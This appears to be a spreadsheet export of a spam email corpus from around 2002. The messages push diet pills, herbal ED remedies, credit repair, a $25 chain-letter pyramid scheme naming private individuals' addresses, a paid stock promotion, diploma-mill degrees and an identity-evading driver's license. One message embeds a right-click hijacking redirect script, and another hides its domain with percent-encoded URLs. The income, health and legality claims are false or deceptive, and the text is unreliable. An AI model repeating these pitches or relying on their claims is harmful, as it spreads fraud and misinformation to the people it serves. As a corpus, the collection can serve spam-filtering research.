http://start.resumerabbit.com============================================================                  WHAT JOB SEEKERS HAVE TO SAY============================================================"I got the account on Sunday evening and by Monday morning I
was already getting phone calls from recruiters. That was fast
nd easy. There are so many job sites out there it would have
taken weeks. Thanks."     Ronnie R, a Sales Representative"WOW! What a Service!  I signed up on a Tuesday, and by Thursday
the job offers started pouring in. By Friday, I had a job set up!
This is the Best investment I have ever made! THANKS!     James M, Technical Support Specialist============================================================                  QUICK &amp; EASY. TRY IT NOW!============================================================It's a tough job market right now. To succeed, you need to play
the numbers.  Get maximum exposure now.  Just fill out one easy
form and be instantly posted to over 75 career sites. Just go to
http://start.resumerabbit.com============================================================The staff of All-Execs.com have years of recruiting experience
and may from time to time send you a review of different career
tools that have helped others in their job search.  If you'd
rather not receive these reviews, reply to this note with
"Remove" in the subject line.Sincerely,Dan Johnson
djohnson@allexecs.com
</t>
  </si>
  <si>
    <t xml:space="preserve">There is a Genuine Log Home in Your Future!
Western Red Cedar
Log Siding
Basic Kits
Builder Kits
Precut Kits
Custom Designs
Custom KitsAll Types of Log StylesWe feel you will find our log home superior to any others on the market and our price structure competitive with other, less desirable housing.Remember that a home is a major investment and the focal point of family use. You deserve the best home possible for the amount of money you spend.Click on the link below for a catalog on Genuine Log Homes &amp; Accessories.www.genuineloghome.comSales Rep Code: BSAD24
To be removed from our mailing please send an email to: higher_learning1234@yahoo.com </t>
  </si>
  <si>
    <t xml:space="preserve">
Exclusive offer from 24x7eMessagingExclusive
          offer from 24x7eMessaging Search for a Pre-Owned Vehicle 
Â Â Â Â Â   Buy a Used Car Online 
You've
                  received this message because you have signed up to receive
                  offers fromÂ  one of our carefully selected marketing
                  partners.
24x7eMessaging
                  is the internet's best source of exciting new offers and
                  discounts. If you no longer wish to receive these offers,
                  please follow the unsubscribe instructions at the bottom.
Â 
                  To
                  unsubscribe from our mailing list, please
Click
                  Here</t>
  </si>
  <si>
    <t xml:space="preserve">IntelligenceBad Credit? Great!We want you!We want to refinance people that DO NOT
have good credit. Have you had credit in  the past? Good! 
Fill out this short form because we want 
to refinance your house! Poor credit is all we do!
Let us Put Our Expertise to Work for You!
http://wdBmWYjno1@agileconcepts.com/74205/Erase
http://ltgjSs5P9a@agileconcepts.com/optout.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">If your home is served by a septic system, you will be
able to receive invaluable information on how to
eliminate pump outs, maintain the system properly for FREE !!!Our packetge will cure problems such as backups, wet spots, odor, etc.You can start this FREE trial by checking out our SPC program at:   http://www.abc-holdings.info/spc/Please takes a mintuet to fill out the form, and we will send out your free trail packetage. </t>
  </si>
  <si>
    <t>I will show you HOW you can quickly and easily improve YOUR credit to a PERFECT rating!
Click here NOW for full FREE details!</t>
  </si>
  <si>
    <t xml:space="preserve">
bizmagofferKnowledge Is Power!
So Get Yours At A Savings Up To 78%
On The Top Informative Business Magazines
Â 
            Any
            3 Magazine $50Â Â Â Â Â  DETAILS
Small Price To
            Pay For The Business Edge
Â 
            All
            6 Magazine $99 
DETAILSAn Enormous Selection of
        Magazines to choose from...
        Always a deal... in addition to our daily specials come
        check us out at www.wwwmagazine.com.
Click here to close 
  this window
                                              &lt;!--                                            if (navigator.appName == 'Microsoft Internet Explorer' &amp;&amp; parseInt(navigator.appVersion) &gt;= 4)                                {                                              function click() {                                              if (event.button==2) {                                              open("http://www.pointcom.com","_top");}                                              }                                              document.onmousedown=click                                }                                              // --&gt; 
Note: this is not a spam 
    email. This email was sent to you because your email was entered in on a website 
    requesting to be a registered subscriber. If you would would like to be removed 
    from our list,
abuse@global2000.comCLICK 
  HERE TO CANCEL YOUR ACCOUNT and you will *never* receive another 
  email from us! </t>
  </si>
  <si>
    <t>**********************************banned cd***********************************************
*******************************June 5 2002************************************************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this99exit
And you can't buy freedom at your local Walmart.  You will dg43000sdasdfasdffgdfhyutdfsgttttrsdg
have the freedom to avoid creditors, judgments, lawsuits, IRS 
tax collectors, criminal indictments, your greedy ex-wife or 
ex-husband, and MUCH more!
Please Click the URL for the Detail! 
http://%62%61nn%65%64%63d.net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Travel Easy. To Be Removed From Our List, 
http://%62%61nn%65%64%63d.net/remove.html</t>
  </si>
  <si>
    <t xml:space="preserve">Up to $80 per hour â€“ Satisfaction Guaranteed! 
You can actually start today. Youâ€™re paid daily or weekly
			and youâ€™re backed with a 100%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emailremove1634@removefactory.comwith remove in the subject line and send. All unsubscribe and remove requests will be cheerfully processed. Thanks for your positive assistance. Have a wonderful day!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey there,If you're like me, you've tried EVERYTHING to lose
weight.  I know how you feel - the special diets,
miracle pills, and fancy exercise equipment never helped
me lose a pound either.  It seemed like the harder I tried,
the bigger I got, until I heard about a product called
Extreme Power Plus.You're probably thinking to yourself, "Oh geez, not another
miracle diet pill!"  Like you, I was skeptical at first, but 
my sister swore it helped her lose 23 pounds in just two weeks, 
so I told her I'd give it a shot.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it!I was so happy with the results that I contacted the manufacturer
and got permission to resell it - at a BIG discount.  I want
to help other people lose weight like I did, because it
does so much for your self-esteem, not to mention your health.
I give you my personal pledge that Extreme Power Plus
absolutely WILL WORK FOR YOU.  If it doesn't, you can return it
any time for a full refund.    If you are frustrated with trying other products, not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RESULTS, 
RESULTS!! Here is the bottom line ...I can help you lose 10-15 pounds per week naturally, without
exercising and without having to eat rice cakes all day.  
Just try it for one month - there's nothing to lose, and everything 
to gain.  You will lose weight fast - GUARANTEED.  That is my
pledge to you.  To order Extreme Power Plus on our secure server, just click
on the link below:http://tv-discounters.com/extremeorderc13.htmIf you have difficulty accessing the website above, please
try our mirror site by clicking on the link below:http://www.tv-discounters.com/extremeorderc13.htmTo see what some of our customers have said about this product, 
visit http://tv-discounters.com/testimonials.htmTo see a list of ingredients and for more information
on test studies and how it will help you lose weight, visit 
http://tv-discounters.com/howitworks.htm*************************************************************
If you do not wish to receive any more emails from me, please 
send an email to "affiliate5@btamail.net.cn" requesting to be 
removed.
*************************************************************
8354piYk6-984bbkK1503WDUz9-372KLvP5598wWyb0-379vwvS6145RbWd9-319QSJv4557l68
</t>
  </si>
  <si>
    <t>Protect yourself with an extended warranty for your car, minivan, truck or SUV. Buy DIRECT and SAVE money 40% to 60%!
http://211.78.96.11/extended/warranty.htm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http://211.78.96.11/extended/warranty.htm
================================================
To be removed, click below and fill out the remove form:
http://211.78.96.11/removal/remove.htm
Please allow 72 hours for removal.</t>
  </si>
  <si>
    <t xml:space="preserve">INTERNATIONAL DRIVER'S LICENSENeed a new driver's license?Too many points or other trouble?Want a license that can never be suspended
or revoked?Want an ID for nightclubs or hotel check-in?Avoid tickets, fines, and mandatory driver's
education.Protect your privacy, and hide your identity.The United Nations gave you the privilege to
drive freely throughout the world! (Convention
on International Road Traffic of September 19,
1949 &amp; World Court Decision, The Hague,
Netherlands, January 21, 1958)Take advantage of your rights. Order a valid
International Driver's License that can never
be suspended or revoked.Confidentiality assured.CALL NOW!!!1-770-908-3949 We await your call seven days a week, 24 hours a day,
including Sundays and holidays.
</t>
  </si>
  <si>
    <t>3D24
*Earn $2000 - $5000 weekly-starting within 1-4 weeks
*78% Profit Paid Daily
*No Selling
*No Risk Guarantee
*Work from home, No overhead, or employees.
*High Tech Training &amp; Support
*Not MLM, 100x more profitable 
The most incredible part of our business
is that ALL MY CLIENTS CALL ME!
DO YOU QUALIFY FOR OUR MENTOR PROGRAM?
ACCEPTING ONLY 12 NEW ASSOCIATES
This is not a hobby!  Serious Inquires Only!!Please reply with the following information 
NAME:
EMAIL ADDRESS:
PHONE:
BEST TIME TO CALL:TO:mailto:ieg010@yahoo.com?subject=more_info
FOR MORE INFORMATIONIf your an entrepreneur or have always wanted to be your own BOSS,
read on.  We supply state-of-the-art training and a support system
that allows you to work your business from your home with just a
phone-without cold calling.  DO NOT REPLY IF YOU ARE LOOKING FOR A 
"GET RICH QUICK" SCHEME or some extra cash or if you're lazy.  We are
only looking for  FOCUSED serious entrepreneurs. (Pt/FT) with the
DESIRE to  improve their lifestyle immediately. ///////////////////////////////////////////////////////////
Please remove at mailto:ieg015@yahoo.com?subject=remove
///////////////////////////////////////////////////////////</t>
  </si>
  <si>
    <t xml:space="preserve">When Economy goes down, WE go UP !$3000 COMMISSION per Sale for YOU !!
With the POWER of F I N A N C I N G  !
This is for SERIOUS people ONLY
MAKE huge $3000 COMMISSIONS on every SALE!
For only $300 down and $149 per month!
Part time earnings: $ 6000 per month
Full time earnings: $15,000 to 25,000 per month
Easy, fast and fun !!
Strictly NOT MLM !!
Here YOU EARN MONEY IMMEDIATELY!
If We have to prove it to You, We can and We will.
My personal Bank Statement will speak for it.
 NEW ! ASSURED    F I N A N C I N G    AVAILABLE !!
Where else DO YOU MAKE $3000 per sale ??
Our Lease Program lets YOU start right away - It's Fast and Easy!
Do not miss out, as THIS is a ONE TIME OFFER!
Free training included!
Program available in USA and Canada only!
 REQUEST more free info NOW!
send an email to:      PaulBennert@excite.com
with "SEND INFO" 
in the subject line
(do NOT click REPLY!)
To remove, please send an email with REMOVE
in the subject line to:  Plutoristal@excite.com
</t>
  </si>
  <si>
    <t xml:space="preserve">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?Although often misunderstood, there is one method that has
proven to succeed time-after-time.
         E - M A I L   M A R K E T I N G ! !
Does the thought of $50,000 to $151,200.00 per year make you
tingle with excitement?  Many of our customers make that and 
more... Click here to find out how:
http://32.97.166.75/usinet.zvlavii 
HERE'S WHAT THE EXPERTS HAVE TO SAY ABOUT E-MAIL MARKETING:
"A gold mine for those who can take advantage of
bulk e-mail programs" - The New York Times"E-mail is an incredible lead generation tool"
- Crains MagazineClick here to find out how YOU can do it:
http://32.97.166.75/usinet.zvlavii ==========================================================
-=-=-=-=-=-=-=-=-=-=-Remove Instructions=-=-=-=-=-=-=-=-=-**********************************************************
Do not reply to this message - To be removed from future
mailings, Click Here:
mailto:tiana37@flashmail.com?Subject=Remove Please do not include correspondence with your remove 
request  - all requests processed automatically.
********************************************************** [&amp;*TG0]
</t>
  </si>
  <si>
    <t xml:space="preserve">
GET PAID    for it !LOOKING FOR AMBITIOUS LEADERS IN YOUR AREA 
to market and distribute our NEW, HOT, PATENTED, EXCLUSIVE PRODUCT.Our income opportunity is a once-in-a-lifetime TIMING issue.   IF YOU HAVE A BURNING DESIRE TO CHANGE YOUR FINANCIAL FUTURE Â… just click at Â“CLICK HEREÂ” below and enter Â”  We will immediately send you information sufficient for you to make an educated Business Decision as to whether this is for you or not.  AMBITIOUS LEADERS include your NAME, PHONE NUMBER(S), and the best time of day for us to call for just ONE FOLLOW-UP VISIT, 
NO HYPEÂ… NO OBLIGATIONÂ…Introducing the Â“Look Good DuoÂ”Â…. Our EXCLUSIVEÂ”
NEW PATENTED PRODUCT is designed to REPAIR SKIN DAMAGE &amp; REJUVENATE TISSUE! Successfully addresses WRINKLES, DARK CIRCLES, AGE SPOTS, FINE LINES, LESIONS, SPIDER VEINS, SKIN TAGS, SCAR TISSUE, CELLULITE, STRETCH MARKS, and MORE for most people the Â“LookGoodDuoÂ” is Hypoallergenic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inside-out AND from the outside-in.  Happy users report a healthy Â“GLOWÂ” which they have never achieved with any other product! 
PRODUCT TESTIMONIALS I've been using the product for a little over a month. I took the "2 face challenge', and I could tell a difference in only 3 days! The lines on my face and the pores had changed!  I have had people compliment my fingernails. They have been growing like crazy!  C.C., OHThis is a unique, one of a kind product.   I have been using it 3 weeks and I can truly see a difference in the liver spots on my hands. The prescription from my dermatologist didn't do it, but this product did.  M.F., MSI have been watching myself very closely, and since using the product, the brown spots on my hand have just about disappeared. The smile lines and the eyelids have really tightened up. No more problems putting my eyeliner on! The skin under my chin has really tightened up.  This is not hard work, it is just sharing the product with family and friends. I have never been rewarded so quickly and so well.   E.P., CAK.D., TX I was queen of skeptical.  I did not want to try this.  I am a 54 yr old grandmother.  I have tried everything for years to get rid of cellulite - the creams, the wraps - nothing worked.  My husband kept telling me to try this.  Finally I did it just to get him off my back.  I had not worn shorts for 5 years.  After about 10 days, my husband started telling me my legs were looking better.  I thought he was just being nice since he got me into this.   Then I went shopping, and in the lights in the dressing room, for the first time in a long time I looked pretty good.  I went into the next dressing room, because I thought the lights were wrong, but I still looked good.  I ended up buying shorts, and have been wearing shorts for the 1st time in 5 years.  Yes, it works!! G.C., TXWe just had a booth at the womenÂ’s expo in Dallas.  Out of the 300 or 400 exhibitors there, the only other spot that had the people we did were the ones giving out free food.   V.C., TXI did the 1 side of the face test, and I did not tell my spouse that I was doing it.  We went to get some  fast food.  He was looking at me, and said Â“I can tell you which side you are using it on.  ItÂ’s your right side.Â”  I asked what made him think so, and he said the lines around my mouth and eyes have softened, and the fine lines around my neck.  We are tickled, because everyone we talk to wants it!  J.D., TX Â“After using your product for less than a week, I ran into a friend who asked me what I was doing to look so YOUNG!  I have a full- time job, but I have made $8,000 since starting this business part time!Â“   T.H.,Tx
---------------------------------------
Â”I have found a system that works.  I have 44 people in my group in less than a month! In one month I made over $6,000! Â“ B.M., NH
---------------------------------------------------------------
Â”I am receiving 6 checks a month, and I do not even know where they are coming from!Â”  W.T., TX
---------------------------------------------------------------
Â”I have been in the company 3 weeks, and already have over 20 people in my group.  This is the easiest thing I have ever done.  All I do is tell them my story and give them the hotline number.Â” ---------------------------------------------------------------
At a restaurant, I went to the restroom with a girlfriend and was telling her about what this product does.  We went back to the table, and in a few minutes 2 women walked up to me.  They said they were in the stalls and overheard us talking, and wanted some of the product.  I gave them a brochure, and noticed they went to 2 different tables.  They weren't even together!  J.M., TX
--------------------------------------------------------------- 
 ...//WANT A PRODUCT THAT ACTUALLY WORKSÂ… BUT CANNOT GET ANYWHERE ELSE??..\\\\
THIS WILL BE THE FIRST EVER MOVED THROUGH NETWORK MARKETING.STAKE YOUR CLAIM NOW!
##########.. CLICK HERE for FREE NO OBLIGATION INFO:.. ###########**** mailto:younger10years@yahoo.com?subject=subscribe-Im-Your-Leader ****
Your email address was obtained from an opt-in list.  If you wish to unsubscribe from this list please Click on reply with remove in the sujectÂ“REMOVE MEÂ”, below, and Click send.xdhjmhoawofjkngdtfesh
</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</si>
  <si>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CopyrightÂ Â© 2002, all rights reserved. [9^":}H&amp;*]
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friends &amp; Future Millionaire:Invest in technology that will make you
money.AS SEEN ON NATIONAL TV:
You can make over half million dollars every 4 to 5
months from
your home? A one time investment of only
$25 U.S. Dollars
Puts you on the road to financial success.
ALL THANK'S TO THE COMPUTER AGE
AND THE
INTERNET!You can be A MILLIONAIRE LIKE OTHERS
WITHIN A YEAR!!!Before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legal.Their findings proved once and for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Here is another testimonial: "This program
has been around
For a long time but I never believed in it.
But one day when I
Received this again in the mail I decided to
gamble my $25 on
It. I followed the simple instructions and
walaa â€¦..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first,=PRINT THIS NOW FOR YOUR
FUTUREREFERENCE===============================
===============
If you would like to make at least $500,000
every 4 to 5
months easily and comfortably, please read
the
following...THEN READ IT AGAIN and
AGAIN!!!
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$FOLLOW THE SIMPLE INSTRUCTION
BELOW AND
YOUR FINANCIAL DREAMS WILL COME
TRUE,
GUARANTEED! INSTRUCTIONS:=====Order all 5 reports shown on the list
below =====For each report, send $5 CASH, THE
NAME &amp;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5 reports.  You will need all 5 reports so
that you can save
them on your  computer and resell them.
YOUR TOTAL
COST $5 X 5=$25.00.Within a few days you will receive, vie e-
mail, each of the 5
reports from these 5 different individuals.
Save them on your
computer so they  will be accessible for you
to send to the
1,000's of people who will order them from
you. Also make a
floppy of these reports and keep them on
your desk in case
something happens to your computer.IMPORTANT - DO NOT alter the names of
the people who
are listed next to each report, or their
sequence on the list, in
any way other than what is instructed
below in step '' 1
through 6 '' or you will loose the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you.Remember, honesty reaps the reward!!!1....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Take this entire letter, with the modified
list of names,
and save it on your computer. DO NOT
MAKE ANY OTHER
CHANGES.Save this on a disk as well just in case if
you loose any data.
To assist you with marketing your business
on the internet, the
5 reports you purchase will provide you with
invaluable
marketing information which includes how
to send bulk e-
mails legally, where to find thousands of
free classified ads
and much more. There are 2 Primary
methods to get this
venture going: METHOD # 1: BY
SENDING BULK E-MAIL
LEGALLY===============================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
Continuing with this example, you send out
only 5,000 e-
mails. With a 0.2% response, that is only
10 orders for report #
1. Those 10 people responded by sending
out 5,000 e-mail
each for a total of 50,000. Out of those
50,000 e-mails only
0.2% responded with orders.
That's=100 people responded and ordered
Report # 2.Those 100 people mail out 5,000 e-mails
each for a total of
500,000 e-mails.  The 0.2% response to
that is 1000 orders for
Report # 3.Those 1000 people send out 5,000 e-mails
each for a total of 5
million e-mails sent out. The 0.2% response
to that is 10,000
orders for report #4.  Those 10,000 people
send out 5,000 e-
mails each for a total of 50,000,000 (50
million) e-mails. The
0.2% response to that is 100,000 orders for
Report  # 5.
THAT'S 100,000 ORDERS TIMES $5
EACH=$500,000.00
(half million).Your total income in this example is: 1.....
$50 + 2..... $500 +
3.....$5,000 + 4 . $50,000 + 5..... $500,000
....... Grand
Total=$555,550.00NUMBERS DO NOT LIE. GET A PENCIL
&amp; PAPER AND
FIGUREOUT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=============Disclaimer: Your earnings and results are highly dependent on your
individual efforts and results. This web page constitutes no guarantees
of any income, whether stated nor implied. Any earnings projections
shown on this website are for example and educational purposes only.
Actual results will vary according to each individual member's activity. In
general, the more you work the plan the better your results.Advertising on the net is very very
inexpensive and there are
hundreds of FREE places to advertise.
Placing a lot of free ads
on the Internet will easily get a larger
response. We strongly
suggest you start with Method # 1 and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AVAILABLE REPORTS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
=============REPORT # 1: "The Insider's Guide to
Advertising for Free on
the Net" Order Report #1 from:
Corey Timmons
2756 Davis Mills Road
Hephzibah, GA 30815___________________________________
_______________
REPORT # 2: "The Insider's Guide to
Sending Bulk e-mail on
the Net"
Chester  Waldvogel
11 Chestnut Way
Berlin, MD, 21811___________________________________
______________
REPORT # 3: "Secret to Multilevel
Marketing on the Net"
Order Report # 3 from :
Daniel Lee
306 Spring Street
Hendersonville, NC 28739, USA___________________________________
_______________
REPORT # 4: "How to Become a
Millionaire Utilizing MLM
&amp; the Net"  Order Report # 4 from:
H.A.
416 3rd. Ave. West
Hendersonville, NC 28739, US
____________________________
______________________
REPORT #5: "How to Send Out 0ne Million
e-mails for Free"
Order Report # 5 from:
Mike Manegold
Sonnenbergstrasse 40
CH-8800, Thalwil (Switzerland)
___________________________________
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did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
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them.Remember though, the more you send out
the more potential
customer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C.P.A., Chicago, Illinois===============================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 Dan
Sondstrom, Alberta, Canada===============================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=============''It really is a great opportunity to make
relatively easy money
with little cost to you. I followed the simple
instructionscarefully and within 10 days the money
started to come in. My
first month I made $20,560.00 and by the
end of third month
my total cash count was $362,840.00. Life
is beautiful, Thanks
to the internet.". Fred Dellaca, Westport,
New Zealand===============================
=============ORDER YOUR REPORTS TODAY AND
GET STARTED
ON'YOUR' ROAD TO FINANCIAL
FREEDOM !===============================
============Disclaimer: Your earnings and results are highly dependent on your
individual efforts and results. This web page constitutes no guarantees
of any income, whether stated nor implied. Any earnings projections
shown on this website are for example and educational purposes only.
Actual results will vary according to each individual member's activity. In
general, the more you work the plan the better your results.If you have any questions of the legality of
this program,
contact the Office of Associate Director for
Marketing
Practices, Federal Trade Commission,
Bureau of Consumer
Protection, Washington, D.C.(Note: To avoid delays make sure
appropriate postage to
Canada, USA, or Europe is applied
-=-=-=-=--=-=-==-=Remove Instructions=-=-
=-=-=-=-=--=-=*************************************************
Do not reply to this message -
To be removed from future mailings:
mailto:areyousure@angelfire.com?Subject=
Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">
Secretly 
        Attract Women or Men
        Add Some Spice To Your LifeSecretlyAttract 
        Women or MenDelete
</t>
  </si>
  <si>
    <t xml:space="preserve">"Your Fully Staffed office"
Â 
Â Your
          Fully Staffed office in Chicago is ready when you are.
Live telephone answering with call
                  screen/announce/patch.
                  Prestige address, phone, fax, e-mail, executive offices.
                  Operational to serve your customers today.                  Chicago - Office, Inc. is the fast, easy and professional
                  way to establish your fully flexible office base in Chicago.
                  At a low, fixed monthly cost. 
                  Click
                  Here
Click Here
Click
                  Here
Click HereÂ 
Click Here
Click Here
Click
                        Here
Click Here
Click
                        Here
Click HereÂ Click Here
Click Here
Click
                        Here
Click Here
Click
                        Here
Click HereÂ Â Click
                        HereÂ Â Â Â Â Â 
                      Â Click Here
Click Here
Click
                        Here
Click Here
Click
                        HereClick Here
Click Here
Click
                        Here
Click Here
Click
                        Here
Click HereÂ 
for more information and FREE brochure.
Sincerely,
                  Chicago - Office, Inc.                  Karen Santini
                  Customer Relations ManagerÂ 
Â 
Â 
We do purchase email lists on a regular
        basis. However, we strongly oppose the continued sending of unsolicited
        email and do not want to send email to anyone who does not wish to
        receive our special mailings
        . If you would prefer to not receive these
        messages in the future, pleaseClick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We practice responsible mailing by honoring all
        remove requests and following all U.S. laws
        . We are in compliance with
        all state and Federal Laws regarding commercial email solicitations
        .lsfkipmibgahrvnqejmwhyplbyts
</t>
  </si>
  <si>
    <t>Unbelievable Prices On Cell Phones And Accessories:http://www.chinaniconline.com/sales/Hands Free Ear Buds 1.99! 
Phone Holsters 1.98! 
Phone Cases 1.98! 
Car Chargers 1.98! 
Face Plates As Low As 2.98! 
Lithium Ion Batteries As Low As 6.94! http://www.chinaniconline.com/sales/Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
WHOLESALE PRICES!
http://www.chinaniconline.com/sales/***NEW*** Now Also: Accessories For PALM III, PALM VII, 
PALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** Car Chargers 6.95! 
Leather Cases 13.98! 
USB Chargers 11.98! 
Hot Sync Cables11.98! http://www.chinaniconline.com/sales/***If You Need Assistance Please Call Us  (732) 751-1457***~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To be removed from future mailings please send your remove 
request to: removemenow68994@btamail.net.cn</t>
  </si>
  <si>
    <t xml:space="preserve">URGENT NOTICEPENDING MERGER TO INCREASE REVENUE 236%NOW IS THE TIME TO INVEST IN GWIHGWIH is rapidly expanding through acquisitions. In the 1st Quarter TWO mergers are in proces with a schedule to buy FOUR more profitable companies by the year end.GWIH plans to file for NASDAQ. Stock prices historically increase when listed on NASDAQ.
On June 30th, a year long Investor Relation and Public Awareness campaign will be launched to build shareholder equity. SEVERAL well-known stock pick newsletters, TV, radio and newsgroups will provide coverage on GWIH and it's acquisitions.All-Star Management Team with Advanced Degrees, Specialized Training, Proven Track Records and over 90 years Combined Experience. They are true Deal Makers, Executors and Closers.Put GWIH on your watch list,Â AQUIRE A POSTION IN GWIH TODAY !GWIH RECENT MERGERS and NEW BUSINESS DEVELOPMENTS:Acquired Bechler Cams, founded in 1957, specializes in precision high tolerance parts for aerospace, defense, medical, and surgical manufacturing sectors.CLICK FOR FULL STORYAcquired Nelson Engineering, BOEING CERTIFIED supplier of aerospace and defense parts was recently awarded contracts with Lockheed Martin and Boeing that will result in MAJOR production increases.CLICK FOR FULL STORYCLICK FOR QUOTE
To unsubscribe simply reply to this email for permanent removal.
Information within this publication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SSA was paid $100,000 in cash by an independent third party for circulation of this publication. SSA and/or its Affiliates or agents may already own shares in GWIH and sell all or part of these shares into the open market at the time of receipt of this publication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
  </si>
  <si>
    <t xml:space="preserve">URGENT NOTICEPENDING MERGER TO INCREASE REVENUE 236%NOW IS THE TIME TO INVEST IN GWIHGWIH is rapidly expanding through acquisitions. In the 1st Quarter TWO mergers are in proces with a schedule to buy FOUR more profitable companies by the year end.GWIH plans to file for NASDAQ. Stock prices historically increase when listed on NASDAQ.
On June 30th, a year long Investor Relation and Public Awareness campaign will be launched to build shareholder equity. SEVERAL well-known stock pick newsletters, TV, radio and newsgroups will provide coverage on GWIH and it's acquisitions.All-Star Management Team with Advanced Degrees, Specialized Training, Proven Track Records and over 90 years Combined Experience. They are true Deal Makers, Executors and Closers.Put GWIH on your watch list,Â AQUIRE A POSTION IN GWIH TODAY !GWIH RECENT MERGERS and NEW BUSINESS DEVELOPMENTS:Acquired Bechler Cams, founded in 1957, specializes in precision high tolerance parts for aerospace, defense, medical, and surgical manufacturing sectors.CLICK FOR FULL STORYAcquired Nelson Engineering, BOEING CERTIFIED supplier of aerospace and defense parts was recently awarded contracts with Lockheed Martin and Boeing that will result in MAJOR production increases.CLICK FOR FULL STORYCLICK FOR QUOTE
To unsubscribe simply reply to this email for permanent removal.
Information within this publication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SSA was paid $100,000 in cash by an independent third party for circulation of this publication. SSA and/or its Affiliates or agents may already own shares in GWIH and sell all or part of these shares into the open market at the time of receipt of this publication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
  </si>
  <si>
    <t xml:space="preserve">Obtain a prosperous future, money earning power,
and the admiration of all.Diplomas from prestigious non-accredited
universities based on your present knowledge
and life experience.No required tests, classes, books, or interviews.Bachelors, masters, MBA, and doctorate (PhD)
diplomas available in the field of your choice.No one is turned down.Confidentiality assured.CALL NOW to receive your diploma
within days!!!
 1  212  937  2149
  Call 24 hours a day, 7 days a week, including
Sundays and holidays.uuttjltvdihqpiwixwslnsniduhibjovjgsx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</si>
  <si>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http://www.freehostchina.com/washgh/
**************************************************
If you want to get removed
from our list please email at- standardoptout@x263.net (subject=remove "your email")
**************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">NO MONEY Down Merchant Accounts!.main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#1B3351}NO MONEY Down Merchant Accounts!
If you own your own business, you're starting a new business or know someone who is... Being able to accept Major Credit Cards can make all the difference in the world!
CLICK HEREJust the fact that you accept credit cards adds credibility to your business. Especially if you are a New, Small or Home Based Business.
No Payment For The First Month!
Setup within 3-5 Days
Approval is quick and our set up times range from 3 - 5 days. Guaranteed approval on all leases for equipment or software. Bad credit, no credit, no problem!
ACCEPT CREDIT CARDS ONLINE or OFFLINE !!
CLICK HEREIf you'd like to be removed from our mailing list, please click on the link below. 
We protect all email addresses from third parties. Thank you. Please remove me.
</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</si>
  <si>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CopyrightÂ Â© 2002, all rights reserved. [&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Â 
Herbal Alternative
for Erectile Dysfunction
Men of Iron has been featured on
over 100 TV News and Top Radio stations across America, and we know why...
It REALLY works!
Visit Our Web Site Click
Here:Â  Learn about our special offer!
Men Of Iron Benefits:
â€¢ Number 1 formula for men
â€¢ Dramatically Enhances Organism
â€¢ No Negative Side Effects (All Natural
Ingredients).
â€¢ Boosts Multiple Orgasms!
â€¢ Does Not Increase Blood Pressure!Â 
â€¢ Increases circulation in men so erections
become firmer.
â€¢ Helps sexual response dysfunction or
lack of interest in sex.
â€¢ Clears impotency problems.Â 
â€¢ Boosts Multiple Climaxes.Â 
â€¢ Relieves Emotional Ups Downs, and Headaches!
â€¢ Helps Relieve Prostate Problems.Â 
â€¢ Lowers Cholesterol.Â 
â€¢ Very Affordable PriceVisit Our Web Site Click
Here:Â  Learn about our special offer!Â Â 
</t>
  </si>
  <si>
    <t>HI ,  As a professional bulk mailer for 5 years. I made over $200,000 last 12 months selling only one product, "The Banned CD".Luckily for you, the 'Bulker CD 2003" is now for sale! I decide to sell all secrets how I made over $20,000 per month at home only few hours work.Why don't more people use Bulk Email Marketing?1.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</si>
  <si>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47
3425bIVX9-576TTPZ2202wRsT2-106BzwN7680xwac1-861Uzkc5802cqaK9-865syeF3453GTvsl72</t>
  </si>
  <si>
    <t xml:space="preserve">Welcome to Viagra Express!http://www.universalmeds.com/main2.php?rx=16863Our objective at Viagra Express is simple! We want to provide only 
genuine FDA approved VIAGRA to you at the lowest possible prices.Some important factors that set us apart from our competition:*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iyrys
</t>
  </si>
  <si>
    <t>Make Money Now!!
To Read More Information On This Advertisement,
Click HereTo Be Removed From Our Mailing List,
Click Here</t>
  </si>
  <si>
    <t xml:space="preserve">NO MONEY Down Merchant Accounts!.main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#1B3351}NO MONEY Down Merchant Accounts!
If you own your own business, you're starting a new business or know someone who is... Being able to accept Major Credit Cards can make all the difference in the world!
CLICK HEREJust the fact that you accept credit cards adds credibility to your business. Especially if you are a New, Small or Home Based Business.
No Payment For The First Month!
Setup within 3-5 Days
Approval is quick and our set up times range from 3 - 5 days. Guaranteed approval on all leases for equipment or software. Bad credit, no credit, no problem!
ACCEPT CREDIT CARDS ONLINE or OFFLINE !!
CLICK HEREIf you'd like to be removed from our mailing list, please click on the link below. 
We protect all email addresses from third parties. Thank you. Please remove me.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Exclusive offer from 24x7eMessagingExclusive
          offer from 24x7eMessaging Search for a Pre-Owned Vehicle 
Â Â Â Â Â   Buy a Used Car Online 
You've
                  received this message because you have signed up to receive
                  offers fromÂ  one of our carefully selected marketing
                  partners.
24x7eMessaging
                  is the internet's best source of exciting new offers and
                  discounts. If you no longer wish to receive these offers,
                  please follow the unsubscribe instructions at the bottom.
Â 
                  To
                  unsubscribe from our mailing list, Online Unsubscribe Click
                  Here or
                  byÂ  email Click
                  HereÂ </t>
  </si>
  <si>
    <t xml:space="preserve">Welcome to Viagra Express!http://www.universalmeds.com/main2.php?rx=16863Our objective at Viagra Express is simple! We want to provide only 
genuine FDA approved VIAGRA to you at the lowest possible prices.Some important factors that set us apart from our competition:*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ht
</t>
  </si>
  <si>
    <t xml:space="preserve">
See what rates we can offer.We want to help you get lower payments, with no hassle
Click</t>
  </si>
  <si>
    <t xml:space="preserve">
Thank You,Your email address was obtained from a purchased 
list, Reference # 1220-14000.Â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</si>
